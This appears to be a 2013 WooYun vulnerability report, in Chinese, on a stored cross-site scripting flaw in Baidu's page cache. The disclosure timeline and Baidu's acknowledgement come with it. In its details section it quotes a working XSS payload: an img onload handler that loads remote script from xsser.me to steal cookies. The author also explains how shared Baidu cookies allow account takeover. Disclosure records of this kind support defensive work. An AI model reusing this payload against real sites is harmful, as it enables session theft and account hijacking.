当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-016946

漏洞标题:名副其实的“跨”站脚本攻击,百度cache存在安全漏洞(无心插柳柳成荫)

相关厂商:百度

漏洞作者: px1624

提交时间:2013-01-05 16:43

修复时间:2013-02-19 16:44

公开时间:2013-02-19 16:44

漏洞类型:xss跨站脚本攻击

危害等级:低

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-01-05: 细节已通知厂商并且等待厂商处理中
2013-01-05: 厂商已经确认,细节仅向厂商公开
2013-01-15: 细节向核心白帽子及相关领域专家公开
2013-01-25: 细节向普通白帽子公开
2013-02-04: 细节向实习白帽子公开
2013-02-19: 细节向公众公开

简要描述:

XSS了一下大街网,具体可以看 http://www.wooyun.org/bugs/wooyun-2013-016942,莫名其妙的XSS到了百度。看了下,原来是百度的某个功能不安全额。。。

详细说明:

1 之前XSS了一下大街网,在抓的的cookie中竟然看到了百度的域名,很是欣喜。

2.jpg


2 看了一下,是百度快照,既然能被XSS到,就说明百度快照这里也没有过滤我在大街网那个页面插入的XSS 恶意代码。
3 用F12看了下,果然如此,恶意代码如下。

<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" onload="s=document.createElement('script');s.src='http://xsser.me/Du8ka9?'+Math.random();document.body.appendChild(s)" border="0">


1.jpg


4 同理如果其他站有XSS的话,百度快照还是会中招。可以自己XSS自己网站,然后通过百度快照去XSS百度。可以说是普遍撒网,特殊捞鱼。
5 百度快照中招了,由于百度很多地方的cookie是通用的,所以危害可想而知了,直接可以登录别人帐号。

3.jpg

漏洞证明:

看这个地址:http://cache.baidu.com/c?m=9d78d513d9d431aa4f9c91690c66c0171f43f7622bd6a0020ed2843be0732a325012e5ac26525a4592d27d1716d9494b9a802103361450b38f8fc814d2e1d46e6d9f26476d01d71c4d914af3805125b676c302b2f80ee7cda16fccb3868f80154e9c08442bc7b1ca4746498834a10932e7a69942164246edab633ea1&p=9f7cc10a81934ea85b81c7710f5d&newp=837dc64ad4df1aeb05bd9b790e0892695912c10e3ad5cc4e3b89&user=baidu&fm=sc&query=%B7%C7%C4%E3%C4%AA%CA%F4xss%D2%BB%C3%B6&qid=a5f235f41256dea6&p1=1
如果那个大街网的XSS还没有被删。。。

修复方案:

很羡慕那些能收到百度礼物的人。过年了,今年是本命年,求个礼物冲冲喜。

版权声明:转载请注明来源 px1624@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-01-05 18:20

厂商回复:

感谢你对百度安全的关注,我们马上安排处理~

最新状态:

暂无